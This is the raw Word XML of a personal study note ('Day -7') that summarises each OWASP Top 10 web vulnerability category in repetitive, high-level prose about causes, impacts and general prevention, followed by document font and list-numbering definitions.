          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>DAY -7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Owasp to 10 vulnerabilities  understanding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Broken Access Control is a type of cyber attack that exploits vulnerabilities in a web application's access control mechanisms. It can allow attackers to gain unauthorized access to sensitive data or functionality. Broken Access Control can be caused by a lack of input validation, poor session management, or insufficient authorization checks. To prevent Broken Access Control attacks, developers should implement proper access controls, enforce strong authentication and authorization policies, and regularly test their applications for vulnerabilities. Attackers can use Broken Access Control to steal sensitive data, modify or delete data, or take control of an application. Broken Access Control can be prevented by using strong passwords, implementing multi-factor authentication, and regularly updating software and security systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers can exploit broken access control to steal sensitive data, modify or delete data, or take control of an application. Broken access control can be prevented by implementing proper access controls, using secure network protocols, and following best practices for secure coding. Developers should ensure that only authorized users </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>have access to sensitive data and functionality. Other measures include implementing role-based access control, using encryption, and using secure session management techniques. Developers should also ensure that access controls are properly tested and monitored to detect any vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Cryptographic failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Cryptographic failure is a type of security vulnerability that occurs when encryption and decryption mechanisms are not implemented correctly. Cryptographic failure can be caused by weak encryption algorithms, improper key management, or flawed implementation of encryption protocols. Cryptographic failure can lead to data breaches, identity theft, and other types of cyber attacks. To prevent cryptographic failure, developers should use strong encryption algorithms, implement secure key management, and follow best practices for encryption implementation. Attackers can exploit cryptographic failure to decrypt sensitive data, impersonate legitimate users, or execute other types of cyber attacks. Cryptographic failure can be prevented by using strong encryption algorithms, implementing secure key management, and regularly updating software and security systems.</w:t>
      </w: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jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Injection is a type of cyber attack that involves the insertion of malicious code into a web application. Injection attacks can be used to steal sensitive data, modify or delete data, or take control of an application. Common types of injection attacks include SQL injection, cross-site scripting (XSS) attacks, and command injection. To prevent injection attacks, developers should use input validation, parameterized queries, and other security measures. Attackers can use injection attacks to steal sensitive data, modify or delete data, or take control of an application. Injection attacks can be prevented by using secure coding practices, regularly testing applications for vulnerabilities, and implementing security protocols.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>insecure Design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure design is a type of security vulnerability that occurs when a web application is designed with security flaws. Insecure design can be caused by poor software architecture, lack of security controls, or failure to follow best practices for secure design. Insecure design can lead to data breaches, identity theft, and other types of cyber attacks. To prevent insecure design, developers should follow secure design </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit insecure design to steal sensitive data, modify or delete data, or take control of an application. Insecure design can be prevented by using secure coding practices, following best practices for secure design, and regularly updating software and security systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Security misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Security misconfiguration is a type of security vulnerability that occurs when a web application is not configured correctly. Security misconfiguration can be caused by weak passwords, unsecured network protocols, or failure to follow best practices for secure configuration. Security misconfiguration can lead to data breaches, identity theft, and other types of cyber attacks. To prevent security misconfiguration, developers should follow secure configuration principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit security misconfiguration to steal sensitive data, modify or delete data, or take control of an application. Security misconfiguration can be prevented by using secure passwords, following best practices for secure configuration, and regularly updating software and security systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Vulnerable and outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Vulneable and outdated components are a type of security vulnerability that occurs when a web application uses outdated or insecure software components. Vulnerable and outdated components can be caused by failure to update software, use of deprecated software, or use of software with known vulnerabilities. Vulnerable and outdated components can lead to data breaches, identity theft, and other types of cyber attacks. To prevent vulnerable and outdated components, developers should use up-to-date software components, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit vulnerable and outdated components to steal sensitive data, modify or delete data, or take control of an application. Vulnerable and outdated components can be prevented by using up-to-date software components, following best practices for secure coding, and regularly updating software and security systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>identification and authentication failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Identification and authentication failures are a type of security vulnerability that occurs when a web application fails to properly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>identify and authenticate users. Identification and authentication failures can be caused by weak passwords, lack of multi-factor authentication, or failure to follow best practices for secure identification and authentication. Identification and authentication failures can lead to data breaches, identity theft, and other types of cyber attacks. To prevent identification and authentication failures, developers should follow secure identification and authentication principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit identification and authentication failures to steal sensitive data, modify or delete data, or take control of an application. Identification and authentication failures can be prevented by using strong passwords, implementing multi-factor authentication, and following best practices for secure identification and authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>software and data integrity failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Software and data integrity failures are a type of security vulnerability that occurs when a web application fails to maintain the integrity of its software and data. Software and data integrity failures can be caused by failure to follow best practices for secure software development, use of unsecured network protocols, or failure to implement secure coding practices. Software and data integrity failures can lead to data breaches, identity theft, and other types of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>cyber attacks. To prevent software and data integrity failures, developers should follow secure software development principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit software and data integrity failures to steal sensitive data, modify or delete data, or take control of an application. Software and data integrity failures can be prevented by using secure software development practices, following best practices for secure coding, and regularly updating software and security systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Security logging and monitoring failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Security logging and monitoring failures are a type of security vulnerability that occurs when a web application fails to properly log and monitor security events. Security logging and monitoring failures can be caused by failure to implement secure logging and monitoring practices, use of unsecured network protocols, or failure to follow best practices for secure coding. Security logging and monitoring failures can lead to data breaches, identity theft, and other types of cyber attacks. To prevent security logging and monitoring failures, developers should follow secure logging and monitoring principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit security logging and monitoring failures to steal sensitive data, modify or delete data, or take control of an application. Security logging and monitoring </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">failures can be prevented by using secure logging and monitoring practices, following best practices for secure coding, and regularly updating software and security systems. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>server - side request forgery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Server-side request forgery (SSRF) is a type of security vulnerability that occurs when an attacker is able to send a request from a vulnerable web application to an external server. SSRF can be caused by failure to validate user input, use of unsecured network protocols, or failure to follow best practices for secure coding. SSRF can lead to data breaches, identity theft, and other types of cyber attacks. To prevent SSRF, developers should follow secure coding practices, implement secure network protocols, and regularly test their applications for vulnerabilities. Attackers can exploit SSRF to steal sensitive data, modify or delete data, or take control of an application. SSRF can be prevented by validating user input, using secure network protocols, and following best practices for secure coding.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>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alibri">
    <w:altName w:val="Calibri"/>
    <w:panose1 w:val="020f0502020000030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="SimSun">
    <w:altName w:val="宋体"/>
    <w:panose1 w:val="02010600030000010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000203" w:usb1="288F0000" w:usb2="00000016" w:usb3="00000000" w:csb0="00040001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Calibri Light">
    <w:altName w:val="Calibri Light"/>
    <w:panose1 w:val="020f0302020000030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Segoe UI">
    <w:altName w:val="Segoe UI"/>
    <w:panose1 w:val="020b0502040000020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C000E47F" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:altName w:val="Consolas"/>
    <w:panose1 w:val="020b0609020000030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00006FF" w:usb1="0000FCFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Cambria">
    <w:altName w:val="Cambria"/>
    <w:panose1 w:val="02040503050000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6F128CC0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="1800"/>
        </w:tabs>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="00000001"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DAA0AA1C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="00000002"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C6928A44"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="00000003"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="75ACADB0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="00000004"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="217AC734"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="1800"/>
        </w:tabs>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="00000005"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AD4E1D30"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
    <w:nsid w:val="00000006"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="680C027C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7">
    <w:nsid w:val="00000007"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4F5E5D9A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8">
    <w:nsid w:val="00000008"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CA7202F2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9">
    <w:nsid w:val="00000009"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="24CE3B88"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
